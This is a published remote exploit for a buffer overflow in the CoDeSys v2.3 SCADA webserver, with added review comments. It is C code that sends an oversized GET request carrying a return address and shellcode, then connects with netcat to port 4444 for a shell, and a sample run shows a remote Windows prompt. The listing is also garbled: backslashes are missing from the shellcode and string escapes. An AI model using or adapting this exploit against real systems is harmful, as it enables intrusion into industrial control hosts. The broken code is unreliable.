
# Title : CoDeSys SCADA v2.3 Remote Exploit
# Published : 2011-12-01
# Author :


/*
See Also: http://aluigi.altervista.org/adv/codesys_1-adv.txt

CoDeSys v2.3 Industrial Control System Development Software
Remote Buffer Overflow Exploit for CoDeSys Scada webserver
Author : Celil UNUVER, SignalSEC Labs
www.signalsec.com
Tested on WinXP SP1 EN
THIS CODE IS FOR EDUCATIONAL PURPOSES ONLY!
--snip--

root@bt:~# ./codesys 192.168.1.36

CoDeSys v2.3 webserver Remote Exploit
 by SignalSEC Labs - www.signalsec.com

[+]Sending payload to SCADA system!

[+]Connecting to port 4444 to get shell!
192.168.1.36: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [192.168.1.36] 4444 (?) open
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Program Files\3S Software\CoDeSys V2.3\visu>

--snip--

*/

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>

#define name "CoDeSys v2.3 webserver Remote Exploit"
#define PORT 8080
#define JUNK "A"

/*
 * Entry point. Builds one oversized HTTP GET request (a long run of JUNK
 * bytes, a hard-coded return address, then a second-stage byte string),
 * sends it once to TCP port PORT on the host named in argv[1], and then
 * shells out to `nc` against port 4444 on that same host.
 *
 * Review notes, reading the listing exactly as published:
 *  - The request is assembled by repeated strcat() into a fixed 1600-byte
 *    buffer; the combined length of the pieces is never checked against
 *    sizeof request.
 *  - argv[1] is exported unvalidated into the environment and later
 *    expanded by the shell inside system(), so the argument is interpreted
 *    as shell syntax rather than treated as an opaque address.
 *  - Observable artifacts for a defender are visible in the code itself:
 *    a GET request line to the CoDeSys webserver port (8080) carrying
 *    several hundred repeated 'A' bytes, followed by an inbound connection
 *    to TCP 4444 on the same host.
 *  - String literals are reproduced byte-for-byte as they appear on the
 *    page; no attempt is made here to alter them.
 */
int main ( int argc, char *argv[] )
{

 
int sock, i, payload;   /* payload holds the send() return value, not the data */

struct sockaddr_in dest_addr;

char *target = "target";   /* name of the environment variable system() expands */

char request[1600], *ptr;   /* ptr only ever aliases request */


char ret[] = "x67x42xa7x71"; //ret - WINXP SP1 EN , mswsock.dll

/* second-stage bytes appended directly after ret; listing kept as published */
char hellcode[] =
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4cx56x4bx4e"
"x4dx54x4ax4ex49x4fx4fx4fx4fx4fx4fx4fx42x36x4bx48"
"x4ex36x46x52x46x42x4bx58x45x54x4ex43x4bx38x4ex37"
"x45x50x4ax47x41x30x4fx4ex4bx38x4fx54x4ax31x4bx58"
"x4fx55x42x52x41x50x4bx4ex49x54x4bx48x46x33x4bx58"
"x41x50x50x4ex41x33x42x4cx49x59x4ex4ax46x38x42x4c"
"x46x57x47x30x41x4cx4cx4cx4dx30x41x30x44x4cx4bx4e"
"x46x4fx4bx33x46x55x46x42x4ax32x45x47x45x4ex4bx58"
"x4fx55x46x42x41x30x4bx4ex48x36x4bx48x4ex50x4bx34"
"x4bx48x4fx45x4ex31x41x50x4bx4ex43x30x4ex52x4bx38"
"x49x58x4ex36x46x42x4ex41x41x36x43x4cx41x43x4bx4d"
"x46x56x4bx48x43x44x42x53x4bx58x42x44x4ex30x4bx48"
"x42x47x4ex41x4dx4ax4bx48x42x34x4ax30x50x35x4ax56"
"x50x48x50x54x50x50x4ex4ex42x35x4fx4fx48x4dx48x46"
"x43x55x48x56x4ax46x43x53x44x33x4ax36x47x37x43x57"
"x44x33x4fx35x46x55x4fx4fx42x4dx4ax36x4bx4cx4dx4e"
"x4ex4fx4bx53x42x55x4fx4fx48x4dx4fx55x49x58x45x4e"
"x48x46x41x58x4dx4ex4ax50x44x30x45x35x4cx46x44x50"
"x4fx4fx42x4dx4ax56x49x4dx49x30x45x4fx4dx4ax47x55"
"x4fx4fx48x4dx43x45x43x35x43x45x43x55x43x45x43x34"
"x43x45x43x44x43x35x4fx4fx42x4dx48x56x4ax36x41x31"
"x4ex35x48x46x43x45x49x48x41x4ex45x59x4ax46x46x4a"
"x4cx41x42x37x47x4cx47x55x4fx4fx48x4dx4cx36x42x41"
"x41x45x45x35x4fx4fx42x4dx4ax36x46x4ax4dx4ax50x52"
"x49x4ex47x45x4fx4fx48x4dx43x55x45x35x4fx4fx42x4d"
"x4ax56x45x4ex49x44x48x38x49x54x47x55x4fx4fx48x4d"
"x42x55x46x45x46x45x45x45x4fx4fx42x4dx43x49x4ax46"
"x47x4ex49x57x48x4cx49x57x47x55x4fx4fx48x4dx45x55"
"x4fx4fx42x4dx48x56x4cx46x46x36x48x36x4ax56x43x36"
"x4dx46x49x58x45x4ex4cx56x42x45x49x45x49x32x4ex4c"
"x49x48x47x4ex4cx56x46x34x49x48x44x4ex41x33x42x4c"
"x43x4fx4cx4ax50x4fx44x54x4dx32x50x4fx44x54x4ex52"
"x43x39x4dx58x4cx57x4ax43x4bx4ax4bx4ax4bx4ax4ax46"
"x44x37x50x4fx43x4bx48x41x4fx4fx45x47x46x34x4fx4f"
"x48x4dx4bx35x47x45x44x35x41x35x41x35x41x45x4cx56"
"x41x30x41x35x41x35x45x55x41x45x4fx4fx42x4dx4ax56"
"x4dx4ax49x4dx45x50x50x4cx43x45x4fx4fx48x4dx4cx46"
"x4fx4fx4fx4fx47x53x4fx4fx42x4dx4bx48x47x55x4ex4f"
"x43x58x46x4cx46x46x4fx4fx48x4dx44x45x4fx4fx42x4d"
"x4ax56x4fx4ex50x4cx42x4ex42x56x43x45x4fx4fx48x4d"
"x4fx4fx42x4dx5a";

/* banner; `name` is the #define above */
printf ("n%sn by SignalSEC Labs - www.signalsec.comn", name);

/* exactly one positional argument (the target address) is required */
if (argc < 2) 
{
        printf ("nUsage: codesys [IP]n");
        exit (-1);
}

/* argv[1] is placed in the environment without validation; the shell
 * expands it verbatim in the system() call at the end of main */
setenv (target, argv[1], 1);


/* request = "GET /" + 775 x JUNK + ret + hellcode + " HTTP/1.1" + CRLF.
 * No strcat() below is bounded against sizeof request. */
memset (request, '', sizeof (request));
ptr = request;
strcat (request, "GET /");

/* i runs 1..775, i.e. 775 copies of JUNK */
for(i = 1; i < 776; i++){

	strcat (request, JUNK);
}

strcat (request, ret);
strcat (request, hellcode);
strcat (request, " HTTP/1.1");
strcat (request, "rn");


/* plain IPv4 TCP socket */
if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1){
        perror("nsocket errorn");
        exit (1);
        }

dest_addr.sin_family = AF_INET;
dest_addr.sin_port = htons(PORT);   /* PORT is 8080, the CoDeSys webserver port */
/* inet_aton() accepts dotted-quad only; a hostname in argv[1] fails here */
if (! inet_aton(argv[1], &(dest_addr.sin_addr))) {
        perror("inet_aton problems");
        exit (2);
        }

memset( &(dest_addr.sin_zero), '', 8);

if (connect (sock, (struct sockaddr *)&dest_addr, sizeof (struct sockaddr)) == -1){
        perror("nCouldnt connect to target!n");
        close (sock);
        exit (3);
        }

/* single send(); only -1 is treated as failure, a short send is not retried */
payload = (send (sock, ptr, strlen(request), 0));
if (payload == -1) {
        perror("nCan not send the payloadn");
        close (sock);
        exit(4);
        }
close (sock);
printf ("n[+]Sending payload to SCADA system!n");
sleep (1);
printf ("n[+]Connecting to port 4444 to get shell!n");
sleep (2);
/* ${target} is expanded by the shell from the variable set by setenv() above;
 * the "||" branch runs only when nc exits non-zero */
system("nc -vv ${target} 4444 || echo 'Sorry exploit failed! Change RET address or be sure target is not patched!'");
exit (0);
}